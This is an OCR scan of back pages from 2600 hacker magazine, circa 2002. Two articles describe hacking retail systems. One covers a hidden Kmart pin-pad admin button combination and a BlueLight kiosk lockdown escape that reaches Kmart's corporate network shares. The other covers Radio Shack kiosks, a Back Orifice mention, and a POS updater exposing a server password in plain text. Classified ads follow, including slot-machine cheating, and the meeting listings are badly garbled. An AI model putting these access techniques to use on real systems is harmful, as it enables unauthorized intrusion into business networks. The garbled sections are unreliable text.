model CM 2120s, OS 1.07, version 2.1. One can 
gain access to the pin pad by pressing the four 
small buttons by the LCD screen, and the two 
bottom-most buttons, green Enter and red Cancel, 
simultaneously (think Vulcan mind meid). After 
an incorrect password, the pad will cycle, verify- 
ing the applications that the user has authorized 
access Lo. i 

Now, from pin pads to PCs. Walking into 
Kmart, at the Customer Service counter, one will 
immediately see one of two public computers 
running BlueLight.com, Kmart's online shopping 
application. These computers, the other residing 
in Electronics or sometimes Sporting Goods, run 
NT 4, have LCD monitors, a keyboard, and an en- 
closed trackball where the right button is trapped 
under plastic. The BlueLight.com application 
starts automatically, so logging off or shutting 
down just brings the application right back up, 

BlueLight.com (v 1.0.55) is an e-commerce 
application that features products and a shopping 
cart, running on publicly available NT computers 
in many Kmarts across the nation. The applica- 
tion is a browser, accessing the Internet to trans- 
mit selections from the local Kmart to 
Kmart,com's servers (kih.kmart.com). BlueLight 
takes over the machine, running in the fore- 
ground, So the first thing to do is to log off by 
pressing Ctrl+Alt+Delete and clicking Logoff. 
The machine will cycle quickly, bringing up the 
NT desktop and then the BlueLight app. Now, do 
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anything to stop the machine from running the 
Bluelight app. I was lucky: there was a printer 
configuration problem that popped up an error 
window and stopped BlueLigh:. 

I left the printer error window alone and 
started poking around the desktop. | saw that any- 
thing significant that could be accessed from the | 
Start button was missing. Function keys and Task 
Manager were disabled. The only thing in the sys- | 
tem tray was anti-virus and... the clock. I doubled 
clicked the clock and the time was correct. Not 
for long. Windows applicatinns and temporal 
anomalies do not mix. So I set the year to 1980, 
clicked Apply, and OK. Dr. Watson promptly 
crashed. 

What can I leverage here? One of the buttons | 
in the Dr. Watson error window was Help. Click- 
ing Help brought up your favorite Contents-In- 
dex-Search. | messed around in Help until J had — 
the option to search for Windows Help files. This 
gave me an Open File dialog box. . 

Should I search the C drive, C:\WINNT? No, 
I went to Network Neighborhood. And there, with 
little perusing, I saw vast networks like km- ` 
northamerica, kminternational, kih.kmart.com - 
way more than I could write down without being 
noticed. 

I believe Kmart is counting on securing un- 
wanted access from the BlueLight computers 
(which probably have trusted access) to these: 
large nets by locking down these NT boxes. As: 
you can see this isn't the case. 

Finally, I want to discuss, not a hack, but what 
[ can only call negligence. Throughout my explo- 
rations | examined quite a few pin pads. And un- 
derneath many I would find a sticker with an 800: 
number and a client number. The 800 numbers 
belong to either banks or transaction handling: 
companies, and the client number is the only au- 
thentication needed to access sales. deposit, and 
checking account information for a given vendor.. 
Having dealt with small businesses and having 
found these stickers at such, I know that this in- 
formation is held closely, It is a shame that some- 
one needs only 4 remote interest to access this ` 
private information, 


ee 
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by c3llph 
c3ilph@ hotmail.com 

In the summer and autumn of 2000, Radio 
Shacks across the country got a new fixture, the 
Microsoft Internet Center. At the heart of these is 
of course a Compag Presario 5000 series. Most are 
a P3 600 with 128 MB of ram and no anti-virus 
soltware (yes, backdoor-G/backorfice work well 
with these). The computer is linked by cat5 to are- 
veiver/decoder box in the back. A Skystar Advan- 
lage model VSTAT [DU is what this store is 
equipped with. The Skystar is connected by coax 
lo a commercial size two-way dish in the roof. 
(hose in cities are equipped with, in all likelihood, 
DSL. | assume this because in the kiosk it gives the 
choice to learn about high-speed access by either 
DSL or satellite, The stores in rural America are 
equipped with what was Gilat-to-Home (www.gl- 
lacom). After being called Gilat-to-Home, it was 
renamed to Starband. Now Radio Shack or Mi- 
crosoft has dropped them for service because they 
were slowing the show. Other companies have 
looked at Gilat including Echostar, Russia's Yä- 
maltelcom, PMSI, ISKRA, etc. Radio Shack has 
now switched to Hughes, the current owner of our 
favorite free satellite TV provider. Only the server 
side changed, none of the customer equipment. Gi- 
lat had prior to the switch put out version two of 
iheir receiver box, a free upgrade to existing cus- 
lamers. This original setup required you to pur- 
chase one of two "specially configured Compaq 
computers,” priced at $999 or $1299 in addition to 
ihe actual satellite equipment and overpriced in- 
dollaton. Since then, about May or June *01, both 
hase computers have been discontinued and are 
no longer available. From other dealers I have 
lalked to, the lower cost machine wasn't up to par 
to run the system from the beginning. Originally 
set for a January or February ‘01 release was the 
\'SB-only version that could run with an existing 
computer to hook up to the satellite system. These 
USB add-on boxes ended up working with only 
about one out of every ten computers. So they 
ire/have been “finishing” testing for USB-only add 
on boxes. Since these are always connected, they 
have a constant assigned IP. 

In some franchise stores for sure, maybe in cor- 
porate ones also depending on the intellect of the 
managers and their location (i.e., broadband op- 
ons), owners/managers have tied into the 2-way 
satellite to access the Internet for their store's In- 
ermet connection. They do this either by use of a 
eparate computer set up as a proxy server or with 
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All stores (corporate and franchise) keep local 
in-store records only. Once a month the entire 
database is uploaded to Radio Shack’s corporate 
office. The old addresses are included in this for 
the purpose of recent address/phone number 
changes, etc. Then the Radio Shack corporate of- 
fice crosses this with their previous files to com- 
plete the database update. Then we all get a flyer in 
the mail once a month. The flyers come at no cost 
to your local franchise stores. That is why we are 
always asking for your info. It's free advertising. 
Also, a recent update to the Radio Shack POS, 
found at www.radioshackpos.com, Allzip.exe, a 
self-extracting WinZip file, has let us add all the 
zip codes in the U.S. or per state if we so wish, 
Most POS updates have both full install (server) 
and file only (client). Allzip.exe is installed on the 
server only, not any of the client computers. This 
creates two files in the C:\RSPOSICS\RSFILES 
directory, the same directory that holds all inven- 
tory, customer name, and most other database files. 
The files created are Rsallzip.exe and 
Pzipcode.bms. When you run the .exe, you get 
your choice of which states you want to add - one 
or all. You choose which ones, hit OK, then just 
enter the zip code and get the city name. You now 
don't have to ask the customer how to spell Kala- 
mazoo, or wherever they are from. Something in- 
teresting happens after the initial installation and 
running of RSallzip.exe. When run again it wants 
to connect up to the Radio Shack corporate server 
and look for new updates. When it does, it gives a 
basic store info screen that happens to have the 
server password listed in plain text. 

I hope I have shed a little light on Radio Shack 
doings. Also, I hope all of this info is correct. It 
may differ between store types and states. 
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REGISTRATION IS UNDERWAY FOR H2K2 - the 4th HOPE 
conference taking place July 12-14, 2002 at the Hotel Pennsylvania 
in New York City! Admission for the entire weekend is $50. You can 
register online at www,2600.com or send a check/money order by 
6/15/02 to: 2600/H2K2, PO Box 752, Middle Island, NY 11953 
USA, We've secured a special conference rate al the hotel of $109 
for a single or double, $119 triple, $129 quad. Call212-736-5000 
and ask for the H2K2 rate. (You mighteven be able to find cheaper 
rates at hotel discount sites on the net.) The Hotel Pennsylvania is- 
éasily accessible from anywhere in New York City - it’s directly 
across the street from Penn Station on 7th Avenue. We've got 50,000 
square feet to play with and we hive lots of plans for this massive 
space - more than 4 times the space we had for our last conference. If 
you have an idea for a panel or presentation, it’s not too late! E-mail 
speakers @h2k2.net, We're also looking for participants to help us fill 
the space with interesting projects of all sorts including computers, 
robots, artwork, ete. Email space @h2k2.net if you're interested in 
helping us fill the space. We need a ton of volunteers in all urcas to 
make this happen. You guessed it: volunicers@h2k2 net, We will 
also have space for smal) vendors who have things of interest for 
hackers. E-mail vendors @h2k2.net to become part of that. If you 
want to take part in online discussions focusing on the upcoming 
conference, join the H2K2 mailing list by e-mailing major- 

don 2600. com and typing “subscribe h2k2" on the first line of 
your message. As always, chock www. hope.net or www. h2k2 net for 
updates! 

DUTCH HACKER MEETINGS, Every second Sunday of the 
month 1 Klaphek organizes 4 meeting at the meeting point of the 
central station of Utrecht in the Netherlands. Everyone interested in 
hacking related subjects is welcome to show up. These meetings are 
similar to the 2600 meetings. We meet around 14:00 (2 pm) in front 
of the GWE office monthly, We hope to see you there! More info 
can be found at www.klaphek.nlfmestings. html 

SAN FRANCISCO OPENESD USERS GROUP - now meeting 
once a month at the Zephyr Cafe, 20d Thursday - for info see 

http www. sfobug.ong. 

SUMMERCON 2002 will take place May 31-June | in Washington 
DC wt the Marion Renaissance on Sth Ave in NW by Gallery Place. 
For more info; visit www.summercon.org. 


For Sale 


FREEDOM DOWNTIME, the feature-length 2600 documentary, 15 
now available on video! See the adventure unfold as we try to get to 
the bottom of the Kevin Mitnick story and prevent a major motion 
picture from spreading more lies. Available on VHS in NTSC (U.S.) 
format, 121 minutes, Send $20 to 2600, PO Hox 752, Middle Island, 
NY 11953 of order via our online store at www.2600.com. 

REAL WORLD HACKING: Interested in rooftops, steam tunnels, 
and the ike? For a copy of /nfiltrarion, the zine about going places 
you're not supposed to go, send $2 to PO Box 13, Station E, 
Toronto, ON MGH 4E1, Canada. 

MAKE ANY SLOT MACHINE PAYOUT 200-400 credits. Works 
on 16 Ts machines. No contact. Also available, blackjack counters. 
E-mail mcorballi@atlanticcity Icom if you want to discuss it further. 
WWW.PROTECT-ONE.COM. Protect yourself! Everyone has a 
need to be and feel safe from the outside world. We carry a full line 
of self defense, security, and surveillance products at low prices, 
Everything from alarms to mini cameras to telescopic batons to stun 
guns and more! Check us out, all major credit cards accepted. We 
ship worldwide! 

CYBERTECH TECHNOLOGICAL SURVIVAL NEWSLET- 
TER: Bimonthly high tech and low tech DIY information on selire- 
liance and preparedness edited by 2600 writer Thomas loom, Topics 
include communications, security, weaponry, electronics, alternative 
energy, survival medicine, and intelligence operations, Send $12 
cash or “payee blank" money order to Cybertech, PO Box 641, Mar- 
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ion, CT 05444 or subscribe via Paypal on our website ut 
httip://www.ticom-tech com, 

MACINTOSH HACKERS can get all the mac underground files on 
a professionally published CD, 650 Megs of PURE mactilez. In- 
cludes the Deleon 7 Macintosh security speech, the whole Freaks 
Macintosh Archives and Whacked Mac Archives. $25.00 USD - will 
ship internationally. SecureMac, PMB 310, 6170 W, Lake Mead 
Blvd.. Las Vegas, NV 89108, USA. Hack from your Mac! 

LEARN LOCK PECKING It’s EASY with our new book. Learn 
what they don’t want you to know, Any security system can be 
beaten, many times neht through the front door. Be secure. Learn the 
secrets and weakness of today's tocks. If you want to get where you 
are not supposed to be, this book could be your answer, Explore the 
empowering workd of lock picking, Send twenty bucks to Standard 
Publications, PO Box 2226HQ, Champaign, 1L 61825 or visit us al 
wer. standirdpublications comdirect 2600 html for your special 


price. 

COVERTACCESS,COM. Amazing EQUIPMENT and SERVICES 
providing you with the physical and records access you need! 
OVER 150 TELECOM MANUALS are now available online for 
free viewing/downloading at The 5ynergy Global Network's fully re- 
designed website. Most being available in Adobe PDF format, they 
are crisp, clean, suitable for printing, and complete. Update your 
phreak library now before it’s t00 late: We don't know how long this 
website will be allowed to distribute these manuals, however they 
are yours for the time being. Our website is free and open to the pub- 
lic, and requires no purchase of any kind, and is also free from pop- 
up (or pop under) advertisements as well. PAYPHONE SERVICE 
MANUALS TOO! Visit us online at: hitp//www.synerg yglobalnet- 
works.com. 

HATE MICROSOFT? OF do they just leave a foul aftertaste? Show 
your dissatisfaction with a “Calvin peeing on Microsoft” sticker. 
Sticker is approx, 7x9" and fits nicely in a car window or even on 
the side of your favorite *nix box. Each sticker is made of commer- 
cial prade vinyl Water and UW ray resistant, To see 4 sample go to 
http:/fcalvinhatesmicrosoft_hypermart.net. $7,00 (US), $10.00 (US) 
for international, Order the Calvin sticker and the MS logo is yours 
free. That's right, THE MICROSOFT LOGO 15 FREE (eat that one, 
Bill). Send all orders to CD Mayne, PO Box 571791, Murray, Utah 
24157 USA. Cash or money orders only, No checks, credit cards, or 
COD. Allow 2-3 weeks for delivery via USPS. 

BECOME RECOGNIZED as the hacker, phreaker, or computer 
guru you really are. BROWNTER. COM has a wide sehection af 
clothing and gear especially designed for the computer underground. 
From our comedic “Blame the hackers” t-shirt series, to coffee tiugs, 
lo tools and videos, BROWNTER.COM has what you're looking 
for. Check us out! 

CRYPTO OUTLAW T-SHIRTS. Governments around the world 
ate turning innocent people into crypto outlaws, Where will the mad- 
ness end? Cryptography may be our last hope for privacy. From 
Curvedspace, the unofficial band of anarcho-capitalism, Get yours at 
curvedspace.org/merchandise.hitml, 


Help Wanted 


HIRING PROFESSIONAL INTERNET CONSULTANTS with 
job references only for the following: website secunty, performance 
tuning, and marketing for online magazine. Please send your bio and 
resume to: jbhartsworth @ yahoo.com -you can work from home, but 
should five in (or around) NYC, as you will need to tiend a meeting 
or WO. 

NEED ASSISTANCE to rescue/recover ASCII text data which are 
presently compressedencrypted by some type of commercial pro- 
gram, Most files are rather large, from 30MB to about 6000MB. Us- 
ing DOS based search engine for retrieval. Please advise if there 
exists any tools currently available or anyone who may be of help. 
johndp4 @ hotmail.com. 

I NEED TO BUILD A HIDDEN CAMERA SYSTEM including 
sound ona limited budget to take with me on my vists with my 
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child in order to prove that everything is going well, Please c-mail 
any recommendations to lovepulse yahoo.com, fax (208) 330- 
125%, 

LOCKSMITHS; | am in need of a keymaker from only a picture: 
and a pencil sketch over ofa key. Pending on timing and location, I 
imay be able to pel the key for a Saturday ‘or Sunday añernoon met- 
ig: Lara in Kenosha, WI, se | can only go to Milwaukee or North 
Chicago for mectings, Please e-mail at Mifster$8 hotmail.com if 
interested, make the subject “keymaker." 


SEED TECHNICAL ILLUSTRATOR. I'm writing a book on se- 
curity circumvention, lock picking, bypass, safes, alarms, amd other 
subjects, need someone experienced at technical drawings to create 
original black and white (lustrations for my book. | live in the Dal- 
lus-Port Worth arei of Texas and would prefer someone of College 
age nearby, although we could probably manage long distance col- 
labaratiaa. This wall be unpaid work for bath of assum aie book 
gets published, at which point we'd split the profits equally, 1 intend 
ty offer it to Loompanics or Delta Press, and have every confidence 
that they il want to publish if. Please contact me itt 
drill_relocker@ yahoo.com if interested! 
FEMALE HACKERS WANTED IN PITTSBURGH tor a study 
of the beliefs, behavior, and culture of computer hackers. | can offer 
complete confidentiality, 1 pay $35 for an interview. Lhave mo con- 
nection with any law enforcement agency. | ama professor emeritus 
[retired professor) but remain intellectually active, Thave clone so- 
cial research for many decades and have published many articles and 
tour books, T want to publish an article that will give an accerate, 
reasonably sympathetic picture of what hackers are really like - no 
whitewash, no journalistic sensationalism, and no haw enforcement 
hype, Make untraceable telephone call to 402-343-2508 or send un- 
lracéable e-mail message to blieher@ieleramacam. | completed 15 
interviews so far, all with men. Lam told that there are wonrén hack- 
ers but so far none have contacted me, | meet my respondents ina 
public place, so far mostly in Sturbucks coffee shops, You can learn 
about me by doing a Google search for Bernhardt Liebermam. 
KIDNAPPED BY THE SECRET SERVICE, charged with 
UNAUTHORIZED USE OF AN ACCESS DEVICE, all my comput- 
ers confiscated, 8 years remaining on sentence. Father of Pwo seek- 
ing donation of PC*s for kids, both computer savvy but now without 
hardware, software, etc. Am willing Lo pay shipping on donated 
PC's, software, and peripherals, if necessary, Contact me Tor ship- 
ping info; Mr. Derren Leon Felder, Sr. 47742-0606, United Sitates 
Penitentiary, Atlanta, Georgia, Box PMB, 601 McDonough Boule- 
vard, S.E, Atlanta, Georgia 30315-4400; or e-mail me ar bigdar- 
ren200 E yahoo.com, 
HACKERS HEALTH ALERT - BRAZILIAN “MAD COW" 
CONCERNS: Brazil's cattle sheep, and goat meat and associated 
products (dairy products) have been banned by Canada since Febry- 
ary 2001 and the U.S, Department of Apriculnure (USDA) has me- 
stricted the impertation of ruminant products from Brazil after 
March 2, 2001 because of concerns for bovine spongiform en- 
vephalopathy (BSE) (mad cow disease), BSE is always fatal after it 
vals away in human brain tissee and leaves sponge-like holes. Boy- 
com Brazil i is atlemipting to help people understand the Brazi Han 
mad cow" issue. It is essential that ALL COUNTRIES suspend the 
import of beef and dairy. products from Brazil se the Brazilian gov- 
ernmént may prove What is fict and whut is fiction. Visit the Boyet 
Broa! website for more information: www brazilboycort ore. 


SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY 
CALIFORNIA OR FEDERAL COURT? Consult with a semantic 
warrior committed to the liberation of information specializing in — 
hacker, cracker, and phreak defense. Contact Omar Figueroa, Esq ut 
IRINN 086-5591 or (415) 956-5591, at omar taya yale.edu, or at 506 
ivadway, San Francisco, CA 94133, Free personal consultation for 
100) readers, All consultations are strictly confidential and protected 
hy the atomey-client privilege. 
FORMER CYBERCRIME PROSECUTOR now defends those 
mewéstigated of charged with this type of crime. Having becn on the 
atherside, | know how the system works and how the government 
ai iarget YOU! With prosecutors probably wanting you to serve 
pron time, you need a proven veteran trial attorney whe kiows 
how lo handle these cases and who knows how to defend your rights, 


Jason O. Lamm, Esq. (602) 22-CY BER (222-9237). Lamm & Asso- 
citen 5050 N. Sth Place, Suite 12, Phoenix, AZ 85014, Free confi- 
dential and professional consultation, 

GENERAL PURPOSE EMAIL IDENTITY AUTHENTICA- 
TION SERVICE for use from CGI programs. Legitimate uses only 
Please. http:/ipiar.com/nettoyvs/TLAIS. html 

MISUNDERSTOOD HACKERS UNDERSTOOD, Write me: 
Consultations are no charge, and protected by clergy/clent privilege, 
Trained telecom & electronics tech. billy. sunday @techie.com., 
COMPUTER SECURITY/SPY, Is a hacker in your computer or 
network? Do you need a spy? Tf so, call Jason Taylor at (503) 239- 
(431. Porttand, OR inquiries preferred. $60 hour or e-mail 
layior il inelarena:com, 
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WDCD -A WANTON DISPLAY OF CONTROL AND DISRUP- 
TION, WDCD isa half hour radio satire produced by a small group 
ol otherwise unemployed individuals with roomluls wf oli record- 
ings, analog synthesizers, and racks full of swunge electronics gear. 
Born out of the pirate radio scene, WDCD has existed in various 
forms on various unauthorized radio frequencies for longer than any 
of us care to recall (or want to admit to). You can hear WDCD every 
Friday at 6:30 pm ET on 7415 KHz shortwave and on other random. 
frequencies. Tf you don’t have 4 shortwave radio, you're missing-out 
on some interesting stuff! Check out our website for more informa- 
thon: http://www wdedradio.com. Verified WOCO listeners will geta 
free surprise. WDCD Radio, 614-8 8th St, 4319, Philadelphia, PA 
19147. (215) 602-8328. Email mailbag wdedradio.com. 
HACKERMIND: Tune in Thursdays at 10 pm ET by opening loca- 
tion 66.28.48.80:9474 with Winamp or Real Player to hear Hacker- 
mind, the show focusing on the opimions:of those in the hacker 
world. For more details, check out www hackermind.net. 

OFF THE HOOK isthe weekly one hour hacker radio show pre- 
sented Tuesday nights at 8:00 pm ET on WRAL 99.5 FM in New 


“York City. You can also tune in over the net al 


ww 2600 coovoffthehook or on shortwave 10 North and South 
Americaat 7415 kha. Archives of all shows dating back to 1988 can 
be found at the 2600 site, now in mp3 format! Your feedback is wel- 
come at oth 2600,com. 


Personals 


STARTING A HAXOR SUPPORT GROUP and need participa- 
tion from experienced and inexperichced haxors, crackers, and 
phreakers. If you would like to join this FREE service, write mem 
the address below. You may be asked to search for information on 
the “net to assist others with less experience of submit knowledge on 
techniques you know. Also, looking for political views and electronic 
projects as well as ideas for hacking for a magazine 1 am starting. 
Write to tite: at: Larry Heath Wheeler, Rt | Box 150-817592, Fort 
Stockton, Texas 79735. All inquiries will be answered, 
IMPRISONED VIRUS WRITER, Though | wm still a novice at 
virus technology, | do wish to become more knowledgeable through 
correspondence with skilled virus writers. 1 will gladly pay for such 
assistance, Daniel McAvey #646268, Rt: 1, Box 150, Tennessee 
Colony, TX 75884, 


ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even 
think about trying to take out an ad unless you subscribe! Alb ads are 
free and there 15.00 amount of money we will accept for a norn-sub- 
actiber ad, We hope that’s clear, Of course, we reserve the right to 
pass judgment oo your ad and net print it if it's amazingly stupid or 
has nothing al all todo with the hacker world, We make no guarantee 
as to the honesty, righteousness, sanity, etc. of the people advertising 
here. Contact them at your peril All-submissions are for ONE 15- 
SUE ONLY! ff you want to tun your ad more than once you must re- 
submit it each time, Don't expect us to run more than one 4d for you 
in a single issue either. Include your address label or a phótocopy so 
we know you're a subseriber Send your ad to 2600 Marketplace, PO 
Box 99, Middle Island, NY 11953. Deadline for Summer issue: 
6102. 
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Assuleng, near the payphone. & piri 

CANADA 

2, Alberta 

Calgary: Bau Claire Market ee 
court by er pee i 
merty thes! mitt 
Edmonton: deni Citi Centres: 
Lower eki ves ney Todi court” 
by the peu panies ¿ 







Vanconvers ¿Pacific 
Fair, one Tevel ae a 
lewel by iy phones: p 
Victoria Es Co fo foun 
by AR JTA 

New Brunswick 
Mondim: Ground E has Neer, 
Ba) Main SL 









Barrie: Wilt 

Bryne Drive. 

Hamilton: Seve food! i: 
court by payphones and Pr Í 
King. 730 e rF | 
Mor dis all | Co 

10 Gauchetie 


D 


Ey 
"Chane 
Broad aK a 
9299011. 0 
Hull: In La 
oppositie 


tevel 7 pm 


Manchester: T 
Whitworth 


Internet rt me bargat e T pm. ii i ‘i 


FRANCE , j 
Paris: Place d'tahe . 







Mods Ae : blin" 5 

GE z E a yd RY 

Athens: Outside tho bos 

paswtiriou on ihe comer of Patision 
and §tourmari. 7 pm 


All meetings take place on the first Friday of the month, Unless otherwise noted, they start at 5 pm local time. 
To start a meeting in your city, leave a message & phone number at (631) 751-2600 or send email to meetings @ 2600.com. 


a 
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+ TAR/TASU 





pa Binsa Noble s130 


i oneahpro: Indian Mall 








T 
a” Trish 
a ha) 


a 


af" 
2 
p | 
ʻi a 


Auckland: London Bar, upstairs, 
Msn St ¡Auckland Central, 






Christehur - Sve Cafe, comer of 
igh St; ¡and Manchester St 6 pm 


'ellington: «bi ind 5 Bar in Cuba 


j NORWAY 
Oso: Oslo Sentral Train Station. 


ronda Ries Cafe in Nor 
Stargard E nccilinla: Art Cartel 


Bring blug bonk 7 pm. 
RUSSIA 


| Moscow: ‘Burger: ‘Queen gafa Bear 
(Telephone. i Sh- 























hed sis) | i AEE 


a 
ques Arkansas 






windows. a 





by the 
i 


| eth adas Pizzena on 
E (Vons Shopping 


E l ohani (415) 
wb 5, 9806, 
apbell): Orchard 
p et Cale onthe 
Sentral Ave, and E 





dal 


i + paa nA . ona i 
al 


Meriden Square wat 
Legir. 6 pm. —_ 


"Ahing: Ponder ai in 


thre food court, 6 pm. 


Es 


ih I 
W uy A EN 
food court. 





3 City (independence): 
cs & Noble 10120 East 










9/84. 6 pm 


dale 
Pocatello College Market, 604 
South Sth ireet. r 

| amg 
Chica; 
Gren É 





Mall food court by the fountain. 
Ohio 

Akron: Arubica on W.: Marker 

Street, kupena of Hawkins, W 

























(Heitor ord): s): CybeePete's 
l! ne 665 Broadway Ave. 
"Convention ¡Center 
A basement, far tack of 
buliding in carpeted payphone area 
Tpm, 
Dayton: At the Mariona reine 
Dayton Mall. 6 pm. 


iy 
4 
Vey ae 











Missouri 


St. 
Louis: Galleria, Highway A) de 
Bren wood, elevated section, fwd 
area, by the thewters. 


did: Barnes & Noble on 


efield feross from the mail 


= i Nebhresk i 


F View Mall Barnet & 





miri. mej y nbanés \ oat the leew 
level: between the. ein de 
arcade. 


¿de oh neat Tieas sae | 
oe ij Vermont tn 
bein 
oe 














Wisconsin Y 
Madison: Lain South. 
Bundall Ave.) on the lower le M 
the Martin Luther King Je Lounge 
iy the payphones. Payphond! 1908) 
251-9909. 
Milwaukee (Wiitimalosa): May- 
fair Mall on Hwy 100 & Nonh Ave 
in Room Ulio Gi 50, pa 








2600 Magazine 





Dutch Payphones 





imsterdam. Increasingly hard to find, this Amsterdam. Increasingly casy to find, this 
hone only accepts coins, phone doesn't accept coins. 





and cards. 


Photos by Daniel Langdon Jones 


Come and visit our website and see our vast array of payphone 
photos that we’ve compiled! http://www.2600.com 








More Foreign Paynhones 





Phnom Penh, Cambodia, A card-only phone. Phnom Penh, Cambodia. Close-up view. 


Photo by John Bullock Photo by John Bullock 





Willemstad, Curacao. A shape and color so Kyiv, Ukraine. This rotary phone is said to 

rarely seen in the States. only take pre-paid smart cards, although it's 
rather hard to figure out where they would go. 

Photo by Phillip Bettac Zoufal Photo by an anonymous Canadian 


Look on the other side of this page for even more photos! 









